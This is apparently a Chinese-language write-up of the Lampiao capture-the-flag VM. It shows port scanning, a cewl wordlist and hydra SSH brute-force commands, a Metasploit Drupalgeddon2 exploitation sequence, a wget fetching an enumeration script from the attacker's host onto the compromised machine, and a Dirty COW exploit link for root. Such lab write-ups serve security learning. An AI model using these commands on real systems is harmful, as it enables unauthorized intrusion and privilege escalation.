Lampiao(dirtycow)

参考资料:linux 提权脚本


info

1
2
3
22/tcp open  ssh OpenSSH 6.6.1p1 Ubuntu
80/tcp open  http
OS details: Linux 3.2 - 4.8

关于80端口,肯定有防火墙之类的东东== 1

dirbuster、nikto、nmap、unicornscan找不到任何信息。除了浏览器直接访问80端口,返回了一个页面,It’s easy,个鬼啊!!!

最神奇的是只要burp一挂代理,目标机就没有响应了,一关代理,就返回It’s easy的页面。感觉好像被靶机作者调戏了。 12 em…应该是连接80端口,就会发送回这个字符画。

我不想爆破ssh了,看wp吧== 看大佬表演。。

思路一(爆破ssh)

用nmap -p- -Pn -vv ip 扫描将近一个小时,65535个端口,可以发现1898端口开放。 根据这个端口生成一个字典,hydra爆破即可获得shell。 dirtycow exp运行一下,即可得到root权限。

cewl -w dict.txt http://192.168.11.131:1898/?q=node/1 hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.133 ssh

好无聊,爆破什么的没有美感~~

思路二(cms漏洞命令执行)

1898-http

该端口开放http服务,页面下方显示drupal robots.txt提示了,http://ip:1898/CHANGELOG.txt 更新版本为Drupal 7.54

查找可用exploit

Drupal < 7.58 - ‘Drupalgeddon3’ Remote Code

1
2
3
4
5
6
7
8
msfconsole
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set RHOST ip
set RPORT 1898
run
shell

msf导入载荷

在用metasploit找不到可用漏洞的模块情况下,可以在https://www.exploit‐db.com/ 上搜索并保 存。 然后在/root/.msf4/modules/exploits/ 目录下新建一个自定义目录,并在该目录下存放你的msf 模块。 例如,新建/root/.msf4/modules/exploits/new ,并在该目录下存放1234.rb模块。

寻找可用exp的bash脚本

LinEnum.sh,用这个提权脚本搜集可用信息。

1
2
3
4
5
6
7
8
kali执行:
#python -m SimpleHTTPServer
----------------
反弹shell执行:
cd /tmp
wget http://192.168.1.128:8000/LinEnum.sh
chmod a+x LinEnum.sh
./LinEnum.sh > log.txt

运行了提权检查脚本以后,发现输出实在太多了,而且多数是没有什么意义的输出,例如error,xxxx

如果是我来设计提权脚本,我尝试了99种,失败了98种提权尝试,那么我会输出一种可能的提权方式,而不是98失败+1成功。


linux-exploit-suggester.sh

dirty cow,exp :https://www.exploit-db.com/download/40847.cpp 3